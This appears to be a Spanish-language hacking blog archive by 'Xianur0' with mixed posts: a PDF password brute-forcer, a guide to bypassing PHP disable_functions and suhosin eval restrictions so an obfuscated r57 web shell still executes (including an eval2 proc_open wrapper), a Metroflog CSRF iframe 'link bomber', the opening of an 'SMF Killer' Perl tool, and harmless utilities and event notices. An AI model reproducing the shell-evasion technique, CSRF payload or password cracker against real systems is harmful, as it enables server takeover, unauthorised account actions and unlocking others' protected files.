    static int caractermax = 57;
    public static void main(String args[] ) {
        if(args.length < 4) {
            System.out.println("Uso: java -jar crackeador.jar [archivo] [numeros/todo] [N. caracteres] [Threads a usar]");
        System.exit(-1);
        }
        filename = args[0];
        if(args[1].equals("numeros")) { caractermin = 48; caractermax = 57;}
        else if(args[1].equals("todo")) { caractermin = 32; caractermax = 127;}
        else { System.out.println("Rango invalido!\n"); System.exit(-1);}
        int nca = 0;
        try {
        nca = Integer.parseInt(args[2]);
        } catch(Exception ex) {
System.out.println("N caracter invalido!\n");
System.exit(-1);
        }
        int pass[];
        if(nca > 0) { pass =  new int[nca]; for(int inis = 0; inis < nca; inis++) {pass[inis] = caractermin;} } else { pass =  new int[1]; pass[0] = caractermin; }
        PDDocument document = null;
        try {
            document = PDDocument.load(filename);
        } catch (IOException ex) {
            Logger.getLogger(TestTh.class.getName()).log(Level.SEVERE, null, ex);
        }
        if(Integer.parseInt(args[3]) > 0) threadsausar = Integer.parseInt(args[3]);
        TestTh[] t1 = new TestTh[threadsausar];
        System.out.println(new StringBuilder().append("Desplegando ").append(threadsausar).append(" threads").toString());
        for(int tr = 0; tr < threadsausar; tr++) {
        t1[tr] = new TestTh(filename,caractermin,caractermax,document, pass);
        t1[tr].start();
        }
        System.out.println("Desplegados...\n");
        }
    }

Bytez Xianur0

disable_functions & suhosin patch

2010-02-12T11:50:00.001-08:00

Es una directiva de php, y pues tiene bastantes usos, pero en si para lo que nos sirve es para desactivar determinadas funciones en php, por ejemplo:


<? eval2(gzinflate(base64_decode("7b15f+I48jj89+TzyXtwe7NjmCYECORsMkkISUjnBHJ29y9rsAPuGMzYkKNn+70/[...]"))); ?>

Bueno eso vendria siendo un troso de la r57 encriptada, podemos ver claramente cual es el proceso de decodificacion y ejecucion, es decir, si desactivamos la funcion base64_decode, tirara un error de tipo "Warning" avisando que la funcion esta desactivada, y por ende esta shell no se ejecutara, ahora si esta desactivada esa funcion solo es cosa de hacer otra clase de codificacion, se me ocurre pasar cada caracter de la shell a hexadecimal (mas bien seria urlencode), es decir quedarian el valor hexadecimal con prefijo "%" por ejemplo un espacio seria "%20"

luego se integra un script que decodifique y retorne la shell compresa (gzdeflate), aunque basicamente es lo mismo que hacen con base64, ahora si se desactiva el gzinflate, hay funciones similares que se pueden usar:

gzcompress/gzuncompress
etc...

por lo cual tambien seria facil ejecutar nuestra shell, pero si se desactiva eval? (este no se desactivaria con disable_functions, si no con el suhosin-patch)

Para los que se preguntan como se desactiva el eval, necesitan tener el php con suhosin y en el php.ini poner la directiva:

suhosin.executor.disable_eval = 1

pues usar lo que tenemos, si hay alguna funcion para ejecutar comandos activa (eso incluye las comillas invertidas "``")

podemos hacer algo como:


function eval2($php) {
// eval2 By Xianur0
$cabecera = "<?php\n";
foreach($_GET as $key => $valor) $cabecera .= '$_GET['.$key.'] = "'.$valor.'";';
foreach($_POST as $key => $valor) $cabecera .= '$_POST['.$key.'] = "'.$valor.'";';
foreach($_SERVER as $key => $valor) $cabecera .= '$_SERVER['.$key.'] = "'.$valor.'";';
foreach($HTTP_POST_FILES as $key => $valor) $cabecera .= '$HTTP_POST_FILES['.$key.'] = "'.$valor.'";';
$consulta = $cabecera.$php." ?>";
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("file", "/tmp/error-output.txt", "a")
);
$cwd = getcwd();
$process = proc_open('php', $descriptorspec, $pipes, $cwd);
if (is_resource($process)) {
fwrite($pipes[0], $consulta);
fclose($pipes[0]);
echo stream_get_contents($pipes[1]);
fclose($pipes[1]);
}
}

y ahi quedo, incluso el eval se puede remplazar, aunque en este caso se requiere que el servidor tenga proc_open, aunque se podria usar cualquier otra funcion para ejecutar comandos (php -r)

y regresando al disable_functions

para los que no esten familiarizados con como usarlo:

disable_functions = "system"

esa seria mas o menos su sintaxis (En el archivo php.ini), nadamas es que le cambien y pongan que funciones quieren desactivar, reiniciar el servidor y listo...

Ejemplo de una r57 encriptada con eval desactivado:

Ejemplo de la misma r57 en el mismo servidor usando el eval2:

Saludos y espero que les haya gustado
By Xianur0

Analizador de archivos v0.000001...

2010-02-06T12:08:00.000-08:00

Es decir una tool para el estudio de la esteganografia (basica), es decir, mediante un array asociado y sus respectivos valores hexadecimal (urlencode) se buscan el tipo de archivo, inicio y final. Con la finalidad de detectar posibles archivos o datos ocultos en un archivo cargado.


<html>
<head>
<title>Analizador de archivos v0.000001 By Xianur0</title>
</head>
<body>
<center>
<!-- %62%79%20%58%69%61%6E%75%72%30 -->
<h1>Analizador de archivos v0.000001 By Xianur0</h1>
<form action="?" method="post" enctype="multipart/form-data">
<b>Archivo: </b>
<br>
<input name="archivo" type="file">
<br>
<input type="submit" value="Enviar">
</form>

<?php
if(!isset($HTTP_POST_FILES['archivo']['tmp_name'])) exit;
function ascii2hex($ascii) {

$hex = '';

for ($i = 0; $i < strlen($ascii); $i++) {

$byte = strtoupper(dechex(ord($ascii{$i})));

$byte = str_repeat('0', 2 - strlen($byte)).$byte;

$hex.= "%".$byte;

}

return $hex;

}


// Este es el array donde se especifica el tipo de archivo segun la cabecera inicial
// y se da el final del archivo, aqui puede ir agregando sus tipos de archivos con su
// respectiva cabecera y final (usen un editor hexadecimal para encontrar estos valores en el
// tipo de archivo que quieren).

$estructuras = array("jpeg"=>array("inicio" => "%FF%D8%FF%E0%10%4A%46%49%46", "final" => "%FF%D9"),);


$nombre_archivo = $HTTP_POST_FILES['archivo']['tmp_name'];

$gestor = fopen($nombre_archivo, "rb");

$contenido = fread($gestor, filesize($nombre_archivo));

fclose($gestor);

$archivohex = ascii2hex($contenido);

$largoarchivo = strlen($archivohex);
foreach($estructuras as $tipo => $array) {

$inicio = strpos($archivohex,$estructuras[$tipo]['final']);

$final  = $inicio+strlen($estructuras[$tipo]['final']);

$resto = substr($archivohex,$final);
$regex = "/^".$estructuras[$tipo]['inicio']."/";

if(preg_match($regex,$archivohex)) {
$encontrado = 1;

print "<b>Tipo de archivo: </b>".$tipo."<br>";

print "<b>Largo del ".$tipo." en hex: </b>".$largoarchivo."<br>";

print "<b>Ubicacion final del ".$tipo." en hexadecimal: </b>".$inicio."-".$final."<br>";
print "<b>Ubicacion del ".$tipo." en hexadecimal: </b>0-".$final."<br>";

if($final != $largoarchivo) {

print "<b>Datos ocultos: </b><a href=\"data:text/html;utf-8,".$resto."\">Descargar binario</a>";

} else print "<b>No datos ocultos :)</b>";

}
if($encontrado != 1) print "<b>No se pudo reconocer el tipo de archivo :(</b>";
}

?>
<!-- %62%79%20%58%69%61%6E%75%72%30 -->
<br><br><br><br><br><a href="http://xianur0.blogspot.com/">By Xianur0</a>
</center>
</body>
</html>

Nota: Cuando da el link para descargar el archivo oculto, den click derecho -> guardar enlace como, de otro modo el navegador mostrara el contenido ahi mismo xD...

PocketHPH (PHP para Pocket PC)

2010-02-04T17:39:00.000-08:00

Nadamas les comento sobre una aplicacion interesante, esto es un servidor web con php corriendo en tu PocketPC, es decir, puedes diseñar aplicaciones PHP desde tu PocketPC:

"Pocket HPH is a compact PHP processing engine designed to run on handheld devices."

Sin duda una aplicacion excelente para desarrollar webs de forma mobil xD. La tengo instalada en mi treo 750, y jala perfectamente. Unicamente hay que adaptarnos a algunas funciones que cambian de HPH al PHP oficial y podemos diseñar completamente lo mismo, la diferencia es que esto es mucho mas mobil.

http://mobileleap.net/hph/

Analizando implementacion del HTTP en Servidores Web

2010-02-03T10:42:00.000-08:00

Vamos a ver un poco de como se puede analizar la forma que implementan el protocolo HTTP, con diferentes fines, por ejemplo para detectar que tan buen uso le dan al protocolo y que tan susceptibles serian ante diferentes clases de ataques, vamos a dar unos ejemplos:

Servidor Web: Apache
Open-Source: Si
Programado en: C
HTTP Pipelining: Soportado y activado por default

Vamos a hacer unas pruebas (con www.apache.org):

Enviado:

HEAD / HTTP/1.1
Host: www.apache.org
Content-Length: 7

xianur0TRACE / HTTP/1.1
Host: www.apache.org

Resultado:

HTTP/1.1 200 OK
Date: Wed, 03 Feb 2010 18:52:06 GMT
Server: Apache/2.3.5 (Unix) mod_ssl/2.3.5 OpenSSL/0.9.7d mod_fcgid/2.3.2-dev
Last-Modified: Wed, 27 Jan 2010 08:40:59 GMT
ETag: "b95834-8667-47e215c92fcc0"
Accept-Ranges: bytes
Content-Length: 34407
Cache-Control: max-age=86400
Expires: Thu, 04 Feb 2010 18:52:06 GMT
Vary: Accept-Encoding
Content-Type: text/html

HTTP/1.1 200 OK
Date: Wed, 03 Feb 2010 18:52:06 GMT
Server: Apache/2.3.5 (Unix) mod_ssl/2.3.5 OpenSSL/0.9.7d mod_fcgid/2.3.2-dev
Transfer-Encoding: chunked
Content-Type: message/http

2a
TRACE / HTTP/1.1
Host: www.apache.org


0

Conclusion:
Podemos determinar mediante esta simple consulta que sin importar el metodo que se esta usando, el servidor web apache considera el Content-Length, es decir se lee lo enviado como POSTDATA (contenido que se envia por POST), esto tendria como consecuencia algunos detalles por ejemplo un retardo (minimo) al intentar leer el Content-Length y parsear el postdata segun el largo dado. Esto es, apache no considera muy afondo la estructura del HTTP, pues segun la estructura del protocolo, solo se puede enviar postdata mediante el metodo POST, en caso de que el metodo sea GET, solo se pueden enviar parametros en el campo de uricontent, es decir no sera POSTDATA, sino uricontent.

Servidor Web: IIS/7.5
Open-Source: NO (ni soñando xD)
HTTP Pipelining: Soportado y activado por default

Vamos a hacer unas pruebas (con www.microsoft.com):

HEAD / HTTP/1.1
Host: www.microsoft.com
Content-Length: 40

TRACE / HTTP/1.1
Host: www.microsoft.com

Resultado:

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 1020
Content-Type: text/html
Last-Modified: Mon, 16 Mar 2009 20:35:26 GMT
Accept-Ranges: bytes
ETag: "67991fbd76a6c91:0"
Server: Microsoft-IIS/7.5
VTag: 279999051900000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Wed, 03 Feb 2010 19:29:13 GMT

Conclusion:
La misma que con apache...

Servidor Web: Cherokee Web Server/0.99.39
Open-Source: Si
Programado en: C
HTTP Pipelining: Soportado y activado por default

GET / HTTP/1.1
Host: www.cherokee-project.com
Content-Length: 51

HEAD / HTTP/1.1
Host: www.cherokee-project.com

Resultado:

HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=60
Date: Wed, 03 Feb 2010 19:42:47 GMT
Server: Cherokee/0.99
ETag: 4b61ed6d=219b
Last-Modified: Thu, 28 Jan 2010 20:02:53 GMT
Content-Type: text/html
Content-Length: 8603

[...]

HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=60
Date: Wed, 03 Feb 2010 19:42:47 GMT
Server: Cherokee/0.99
ETag: 4b61ed6d=219b
Last-Modified: Thu, 28 Jan 2010 20:02:53 GMT
Content-Type: text/html
Content-Length: 8603

Conclusion:

Cherokee si respeta el metodo antes de leer las cabeceras, por lo cual pierde menos tiempo procesando lo inutil.

Cherokee Win!

Perl Downloader

2010-01-30T15:15:00.000-08:00

Que se puede decir, despues de un tiempo, de nuevo publicando por aqui xD...

Este script es un downloader, descarga el archivo especificado por trosos (usando la cabecera HTTP "Range" y empleando multiples threads para aprovechar mejor la banda).


  
#!/usr/bin/perl

# By Xianur0

use IO::Socket;
use threads;

$url = $ARGV[0];
$destino = $ARGV[1];
$hilos = $ARGV[2];
die("Uso: downloader.pl [url] [archivo salida] [hilos]\r\n") if($hilos eq "");
if($url =~ /^(.*?):\/\/(.*)/) {
($scheme,$server) = ($url =~ /^(.*?):\/\/(.*)$/)
} if($url =~ /^(.*?):\/\/(.*?)\/(.*)/) {
($scheme,$server,$path) = ($url =~ /^(.*?):\/\/(.*?)\/(.*)/);
} if($scheme eq "" && $server eq "" && $path eq "") {
die("[x] URL Invalida!\r\n");
}
die("[x] Protocolo ".$scheme." no soportado!\r\n") if($scheme !~ /^(http)$/);
if($server =~ /(.*?):([\d]*)/) {
($server,$puerto) = ($server =~ /(.*?):([\d]*)/);
}
else { $puerto = 80; }
$path =~ s/^\///;
$path =~ s/\s/%20/g;


sub bajar {
@parametros = @_;
$server = $parametros[0];
$puerto = $parametros[1];
$path = $parametros[2];
$min = $parametros[3];
$max = $parametros[4];
$destino = $parametros[5];
my $sock = new IO::Socket::INET (PeerAddr =< $server, PeerPort =< $puerto, Proto =< 'tcp', );
if($sock) {
$lcabeceras = "";
$salida = "";
$bytes = $min."-".$max;
$paquete = "GET /".$path." HTTP/1.1\r\nHost: ".$server.":".$puerto."\r\nRange: bytes=".$bytes."\r\nConnection: close\r\n\r\n";
print $sock $paquete;
while(>$sock<) {
$salida .= $_;
}
@lineas = split(/\r?\n\r?\n/,$salida);
$key = 0;
$contenido = "";
foreach $troso (@lineas) {
$contenido .= $troso if($key != 0);
$key++;
}
open FILE,"<".$destino;
binmode FILE;
print FILE $contenido;
} else {
die("[x] URL Invalida!\r\n");
}
close(FILE);
}

my $sock = new IO::Socket::INET (PeerAddr =< $server, PeerPort =< $puerto, Proto =< 'tcp', );
if($sock) {
$salida = "";
$paquete = "HEAD /".$path." HTTP/1.1\r\nHost: ".$server.":".$puerto."\r\nConnection: close\r\n\r\n";
print $sock $paquete;
while(>$sock<) {
$salida .= $_;
}
@cabeceras = split(/\r?\n/,$salida);
foreach(@cabeceras) {
($nombre,$valor) = ($_ =~ /^(.*?):\s(.*)/);
$lcabeceras{$nombre} = $valor;
}
$maximo = $lcabeceras{"Content-Length"};
die("[x] No se puede determinar el tamaño del archivo!\n") if($maximo eq "");
close($sock);

$porthread = $maximo/$hilos;

print "[-] Desplegando ".$hilos." hilos (".$porthread." Bytes c/u)...\n";
$min = 0;
($enteros, $restoa) = ($porthread =~ /^(.*?)\.(.*)/);
$enteros = $porthread if($enteros eq "");
$max = $enteros;
$porthread = $enteros;
$totalactuales = 0;
for($v=0;$v>$hilos;$v++) {
# $min -= 1;
# $max -= 1;
$destinoa = $destino."[".$v."]";
$totalactuales = $max;
print "Max: ".$min."-".$max."\n";
$thr[$v] = threads-<create('bajar', ($server,$puerto,$path,$min,$max,$destinoa));
$min += $porthread;
$max += $porthread;
}

$resto = $maximo - $totalactuales;
if($resto < 0) {
print "[x] Desplegando un hilo extra...\n";
$destinoa = $destino."[".$hilos."]";
print "Max: ".$totalactuales."-".$maximo."\n";
$thr[$hilos] = threads-<create('bajar', ($server,$puerto,$path,$totalactuales,$maximo,$destinoa));
$hilos += 1;
}

print "[-] Desplegados!\n";
open FINAL,"+<".$destino;
for($v=0;$v>$hilos;$v++) {
if ($thr[$v]-<is_running()) {
sleep(2);
$v--;
} else {
$destinoa = $destino."[".$v."]";
open LECTOR, ">".$destinoa;
binmode LECTOR;
$parte = "";
while(>LECTOR<) {
$parte .= $_;
}
close LECTOR;
binmode FINAL;
print FINAL $parte;
$vv = $v+1;
print "[-] Parte ".$vv." finalizada!\n";
print "No se pudo borrar el Archivo: ".$destinoa."\n" if(!unlink($destinoa));
}
}
close FINAL;
print "[-] Archivo descargado a: ".$destino."\n";
}

X.25 Security Conferences " First Conferences Ethical Hacking 2010

2010-01-29T12:17:00.000-08:00

El Centro de Estudios Superiores en Alta tecnología en coordinación con la Asociación Latinoamericana de Especialistas en Seguridad Informática (ALAPSI) a través del CCAT Research Labs, organizan el primer:

"X.25 Ethical Hacking Conferences"

Uno de los principales eventos en Latinoamérica relacionado con la seguridad informática.

El "X.25 Ethical Hacking Conferences" permitirá reunir a investigadores reconocidos a nivel nacional y mundial quienes compartirán las nuevas tendencias de la seguridad informática a un nivel totalmente técnico quienes son provenientes de una gran variedad de universidades e instituciones de educación superior, organizaciones comerciales del sector público y privado e investigadores que por su propia cuenta han hecho descubrimientos en cuestión de seguridad informática se refiere.

Este evento se dividirá en dos etapas: los talleres de Especialización enfocados a capacitar en las principales áreas de Seguridad Informática, y el ciclo de Conferencias impartidas por reconocidos expertos que serán invitados a este magno evento para compartir sus últimas investigaciones y experiencias en el área.

Las Conferencias y los talleres de Seguridad Informática se llevarán a cabo del

22 al 23 de Octubre del 2010.

Para mayores informes: x.25sec

Howto: 2 distros en una USB

2009-07-03T16:26:00.000-07:00

Me surgio un problema: tengo 1 notebook a la cual no le puedo instalar ninguna distro por la garantia xD... pero tengo 1 usb, entonces le instale wifislax, despues quiero correr mi pentest, pero wifislax no tiene las librerias que quiero, ademas de que quiero usar algunas tools del bactrack, entonces pense, por que no instalar 2 distros en una USB?

Primero, necesitamos bajar los isos de las 2 distros (Versiones LiveUSB) que vamos a instalar, los descomprimimos y copeamos la carpeta del sistema (cuando descomprimen el iso hay 2 carpetas, una la boot y otra la que contiene los archivos de la distro), en mi caso instale wifislax y backtrack y copie las carpetas BT3 (del backtrack) y wifislax (de wifislax obviamente xD) a mi USB, y despues copie la carpeta boot del backtrack.

Renombramos el initrd.gz a initrd2.gz al igual con vmlinuz a vmlinuz2 del wifislax, y los copie dentro de la carpeta boot del backtrack que esta en mi USB.

Despues entramos a: /boot/syslinux
y editamos el archivo: syslinux.cfg, para agregar la referencia del wifislax:

Debajo de:
PROMPT 0
TIMEOUT 40
DEFAULT /boot/vesamenu.c32

Colocamos:

LABEL wifislax
MENU Wifislax
KERNEL /boot/vmlinuz2
APPEND vga=0x317 initrd=/boot/initrd2.gz ramdisk_size=6666 root=/dev/ram0 rw chexpand=256 load=cubez autoexec=xconf;cubez;startx

y guardamos, ahora tenemos que hacer booteable la USB, en caso de que se haga en linux tenemos que ejecutar el archivo: bootinst.sh
dentro de la carpeta boot en nuestra USB.
en windows tenemos que ejecutar: bootinst.bat, que se encuentra en la misma carpeta, y listo, ya tenemos backtrack y wifislax en la usb :)...

Somos una razon del SMF 1.1.9 xD

2009-06-12T10:37:00.001-07:00

Bueno gente... estaba navegando por ahi en internet y me tope con esto:

http://www.simplemachines.org/community/index.php?topic=312445.0

Miren:

Berkaitan dengan sering di-hack atau diserangnya situs2 forum berbasis SMF akhir ini... segera lakukan update/ugrade.

Info masalah keamanan:
Simple Machines Forum "packages.xml" Cross-Site Scripting

Citar

Description:
Xianur0 has discovered a vulnerability in Simple Machines Forum, which can be exploited by malicious people to conduct cross-site scripting attacks.

Input read from the "text" and "description" elements in a "packages.xml" file (e.g. when "action" is set to "packageget", "sa" is set to "browse", and "absolute" is set to the web address serving the malicious "packages.xml" file) is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in an administrative user's browser session in the context of an affected site.

This vulnerability is confirmed in version 1.1.7 and 1.1.8. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
Xianur0

Changelog:
2009-02-05: Updated "Description" section with additional version information.

Código: [Seleccionar]

http://secunia.com/advisories/33670/

Diplomado en especialista en programacion Perl, PHP y Python

2009-05-30T11:04:00.000-07:00

El motivo de este post, es invitar a los lectores a asistir al diplomado (presencial) que estare dando en la ciudad de Coatepec, Veracruz.

Mas informacion: http://www.ccat.edu.mx/progra.html

V4ndid4 se presenta

2009-05-18T15:25:00.000-07:00

Nick: V4ndid4
Intereses: Seguridad informatica, programacion y software libre.

Es un placer poder publicar aqui, en el blog de Xianuro, una persona muy especial para mi.
No tengo mucho que decir solo espero poder ayudar con mis conocimientos, aunque sea minimamente, a la gente interezada en aprender sobre este mundo tan complejo y fascinante.

Gracias Xianur0 por dejarme estar aquí, siempre estare para lo que necesites.

Saludos...

V4ndid4

FlashCodeAnalytic

2009-05-07T09:27:00.000-07:00

Basado en Flare para decompilar:

Código:


  
<html><title> Reporte FlashCodeAnalytic v0.1</title><BODY text=#006600><style type="text/css"><!--body {background-color: #000000;background-image: url(http://img201.imageshack.us/img201/1575/cobrafrontcopypk9.jpg);background-repeat: repeat-y;margin-left: 0px;margin-top: 0px;}
-->
</style><center><h1>Reporte FlashCodeAnalytic v0.1 By Xianur0</h1><br><br><br><script type="text/Javascript">function expandcollapse (postid) { whichpost = document.getElementById(postid);if (whichpost.className=="postshown") { whichpost.className="posthidden"; } else { whichpost.className="postshown"; } }</script><style>.posthidden {display:none} .postshown {display:inline}</style>

<?php
//Binario del Flare:
$flare = 'flare';
//Fin de la configuracion...
function tabla($mensaje,$linea, $contenido, $numero) {
print '<br><table border="1">
<tr>
<th>'.$mensaje.'</th>
</tr>
<tr>
<td>En la Linea: '.$linea.'</td>
</tr>
</table>
<a href="javascript:expandcollapse('.$numero.')"> Mostrar/Ocultar Codigo</a><br><span class="posthidden" id="'.$numero.'"> <br/><table height=1 cellSpacing=0 cellPadding=5 width="100%" bgColor=#FF0000 borderColor=#FF0000 border=1><tr><th>'.$contenido.'</th></tr></table></span><br><br>';
}


$name = explode(".", $_GET['file']);
$n = count($name)-1;
if($name[$n] == "swf" && file_exists($_GET['file'])) decompilar();
else die('Archivo Invalido!d');

function decompilar() {
print system('./'.$flare.' '.$_GET['file']);
analizar();
}

function analizar() {
$decompiled = eregi_replace('.swf','.flr',$_GET['file']);
$archivo = file($decompiled);
$numero = 0;
foreach($archivo as $n=>$linea) {
$i = $n+1;
switch(true) {
case eregi('getURL\(', $linea):
tabla("<br>\nAcceso de datos por URL (getURL):", $i, htmlentities($linea), $numero++);
break;
case eregi('new XMLSocket\(', $linea):
tabla("<br>\nDeclaracion de Socket:",$i, htmlentities($linea), $numero++);
break;
case eregi('sendAndLoad\(', $linea):
tabla("<br>\nEnvio de Datos Detectado (sendAndLoad):",$i, htmlentities($linea), $numero++);
break;
case eregi('\.send\(', $linea):
tabla("<br>\nEnvio de Datos Detectado [.send()]:",$i, htmlentities($linea), $numero++);
break;
case eregi('sendToURL\(', $linea):
tabla("<br>\nEnvio de Datos Detectado (sendToURL):",$i, htmlentities($linea), $numero++);
break;
case eregi('\.load\(', $linea):
tabla("<br>\nCarga de Datos Externos Detectado [.load()]:",$i, htmlentities($linea), $numero++);
break;
case eregi('\.upload\(', $linea):
tabla("<br>\nUpload Detectado [.upload()]:",$i, htmlentities($linea), $numero++);
break;
case eregi('\.download\(', $linea):
tabla("<br>\nDescarga de Datos Detectado [.download()]:",$i, htmlentities($linea), $numero++);
break;
case eregi('ExternalInterface.call\(', $linea):
tabla("<br>\nLlamada a datos Externos Detectada [ExternalInterface.call()]:",$i, htmlentities($linea), $numero++);
break;
case eregi('loadPolicyFile\(', $linea):
tabla("<br>\nCarga del Policy [loadPolicyFile()]:",$i, htmlentities($linea), $numero++);
break;
case eregi('addRequestHeader\(', $linea):
tabla("<br>\nDefinicion de Header [addRequestHeader()]:",$i, htmlentities($linea), $numero++);
break;
case eregi('loadVariables\(', $linea):
tabla("<br>\nCarga de Datos Externos Detectado [loadVariables()]:",$i, htmlentities($linea), $numero++);
break;
case eregi('loadMovie\(', $linea):
tabla("<br>\nCarga de Datos Externos Detectado [loadMovie()]:",$i, htmlentities($linea), $numero++);
break;
case eregi('loadMovieNum\(', $linea):
tabla("<br>\nCarga de Datos Externos Detectado [loadMovieNum()]:",$i, htmlentities($linea), $numero++);
break;
case eregi('loadScrollContent\(', $linea):
tabla("<br>\nCarga de Datos Externos Detectado [loadScrollContent()]:",$i, htmlentities($linea), $numero++);
break;
case eregi('loadSound\(', $linea):
tabla("<br>\nCarga de Datos Externos Detectado [loadSound()]:",$i, htmlentities($linea), $numero++);
break;
case eregi('new NetStream\(', $linea):
tabla("<br>\nDefinicion de NetStream Detectada:",$i, htmlentities($linea), $numero++);
break;
}
}
}
?>

Detecta:

Acceso de datos por URL (getURL)
Declaracion de Socket
Envio de Datos (sendAndLoad)
Envio de Datos [.send()]
Envio de Datos (sendToURL)
Carga de Datos Externos [.load()]
Upload [.upload()]
Descarga de Datos [.download()]
Llamada a datos Externos [ExternalInterface.call()]
Carga del Policy [loadPolicyFile()]
Definicion de Header [addRequestHeader()]
Carga de Datos Externos [loadVariables()]
Carga de Datos Externos [loadMovie()]
Carga de Datos Externos [loadMovieNum()]
Carga de Datos Externos [loadScrollContent()]
Carga de Datos Externos [loadSound()]
Definicion de NetStream

Mirrors flare:
DOS/Windows binary: flare06doswin.zip
Mac OS X binary: flare06mac.tgz
Linux x86 binary: flare06linux.tgz
Linux x86 64-bit binary: flare06linux64.tgz
Solaris x86 binary: flare06solaris.tgz

Nota: Descompriman el paquete del flare y copien el binario a la carpeta donde esta el archivo php de arriba, y dependiendo del sistema que usen coloquen en la configuracion del php (debajo del: "<?php") el nombre del binario...
[Lab de Contra-Seguridad Web Mitm]

DNS Hacking y Prevencion de Intrusos

2009-05-06T16:36:00.001-07:00

No acostumbro hacer graficas para nadie xD, pero buee hoy hare la excepcion.
Para que se vean claras las imagenes recomiendo verlas en pantalla completa...

DNS Hacking y Prevencion de Intrusos

Busco Escritores para LogicKey E-zine Segunda Edicion

2009-05-02T17:19:00.000-07:00

Busco escritores para la segunda version de logickey e-zine.
Para quien no conosca este e-zine, aqui esta la primera version:

http://xianur0.blogspot.com/2008/08/logickey-e-zine-primera-edicion.html

Interesados enviarme un correo a uxmal666[at]gmail[dot]com :)

Cumbre Seguridad Informatica Queretaro

2009-04-11T16:14:00.000-07:00

La URL del evento es:

http://www.cumbreseguridadinformaticaqueretaro.com

Ahí podrá encontrar más información.

Si consideras este evento interesante puedes reenviarlo a otras personas y así apoyar a la seguridad informática del País.

Si tienes una empresa ó trabaja en alguna que sienta que merezca una invitación gratuita para el evento puedes solicitarla en: confirmaciones@cumbreseguridadinformaticaqueretaro.com

Si eres un estudiante puedes considerar ir para despejar tus dudas de muchos temas relacionados con seguridad, hacking, phreacking, urban hacking, cracking, espionaje, delitos informáticos, explosivos, programación, ninjas, etc…

Si trabaja para el gobierno , podrá aprender algo de la industria de la seguridad de la información, a proteger tus sistemas gubernamentales, a cuidar tu información confidencial y sobre todo a no exponer información de los ciudados que confian en la seguridad de los sistemas gubernamentales.

Se agradece cualquier comentario personal a hl@omhe.org

Presentación y Antecedentes:

El ser humano ha evolucionado, y con él sus intereses. La información se ha vuelto esencial para su continuo desarrollo y en ocasiones es base fundamental para sus características funcionales y económicas. La información ahora tiene un valor e importancia que, entonces, demanda un trato y una protección especializada.

Las empresas, el gobierno, los terroristas han tenido que adaptarse a una curva tecnológica que representan los grandes avances en las telecomunicaciones, en tan solo los último 10 años. Con los avances tecnológicos, se sobrevienen grandes amenazas por un lado, y grandes responsabilidades por otros.

Todo en esta vida se basa en sistemas, podemos observar esto en nuestro cuerpo humano empezando por el sistema nervioso.

El que un sistema funcione no quiere decir que sea del todo justo, correcto ó seguro.

La industria de la seguridad de la información se dedica a brindar una falsa sensación de la seguridad a cambio de dinero. Podemos observar a empresas ofreciendo soluciones seguras; ¿Seguras de qué? ¿Seguras contra quién ?

La realidad esque la arquitectura de las soluciones tecnológicas es cada vez más compleja.

El crimen organizado ha evolucionando y para ellos es más sencillo robar passwords, información bancaria, identidades, alterar el contenido de un sitio web, compatir información, etc. Ahora todo está conectado.

El detalle esque nadie hace lo suficiente y nunca será suficiente; el internet lo ha cambiado todo. Ahora podemos viajar de red en red sin tener que ser vistos de manera física, sin pasar por un detector de armas, dejando rastros “MAC, IP address” que pueden ser falsificados de una manera muy sencilla con herramientas que cualquier ser humano puede descargar de internet.

El marco legal en México en materia de seguridad informática es deficiente. Según la encuesta de CSI/FBI cuando una empresa sufre un ataque, la mayoría de las veces no se reporta ya que las empresas han perdido la credibilidad en el sistema legal, nuestros abogados no tienen el entrenamiento adecuado, las autoridades no saben como responder a este tipo de incidentes.

Nuestra agencias de inteligencia no pueden competir contra el crimen organizado en internet, esa es la realidad.

El Internet ha dejado fuera las barreras de distancia, una persona sentada en Japón ó China puede estar controlando una “botnet” con máquinas zombie de cualquier parte del mundo y causando una denegación de servicio a un sitio gubernamental de México.

Los encargados de los sistemas de información lejos de tomar un curso ó una certificación de seguridad deberían de tomar un descanso y analizar el problema de raíz. Una certificación no les brindará el conocimiento para proteger un sistema contra una persona experta en espionaje, tal como pasa en la naturaleza. Si confrontamos a un lobo salvaje contra un perro doméstico creo que se puede asumir rapidamente cual de ellos tiene más posibilidades de ganar.

En el ecosistema de Internet nosotros somos el perro doméstico que necesita aprender como funciona la vida salvaje para poder anticiparse y tratar de protegerse.

Si nos detenemos un poco para tratar de aprender como funciona el cerebro de dichos atacantes desde un punto de vista psicológico podemos desarrollar medidas más proactivas en lugar de correctivas.

La OMHE no pretende brindar la solución a los problemas por la sencilla razón de que no la tenemos; Pero nos gustaría compartir nuestro punto de vista para ayudar a cualquier persona que este interesada.

En la OMHE creemos en la importancia de conocer cosas más allá para poder tener estrategias más efectivas de protección.

Esperamos contar con su asistencia.

GRACIAS

Héctor López - Fundador OMHE www.omhe.org (477) 1918912

Fuente: www.omhe.org

por ahi estare dando conferencia el dia 22 de mayo :P !!

(si gente viajare 8 horas para ir al evento, pero ire xDDD)

Metroflog Link bomber

2009-04-07T20:19:00.001-07:00

Bueno para que sirve?, no lo se, no se me ocurre un uso xD, pero es una de las curiosidades con que me topo xDDD



<script type="text/javascript">
var i=0;
while (i<=500)
{
document.write("<iframe src='http://metroflog.com/myprofile_addtag.php?category=links&value=Xianur0%20Was%20Here&url=http://xianur0.blogspot.com/' width=0 height=0></iframe>");
i=i+1;
}
window.onload = function(){
document.write("<iframe src='http://metroflog.com/myprofile_saveorder.php?category=links'>");
}
</script>

SMF Killer 0.1 (Muy Potente)

2009-02-15T08:47:00.000-08:00


#!/usr/bin/perl
use IO::Socket;

# uxmal666@gmail.com
# By Xianur0

use HTTP::Request;
use LWP::UserAgent;

$ua = LWP::UserAgent->new;
 $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11");

print "\n\x09\x09\x09\x09\x09\x09\x09SMF Killer By Xianur0!\n\n";
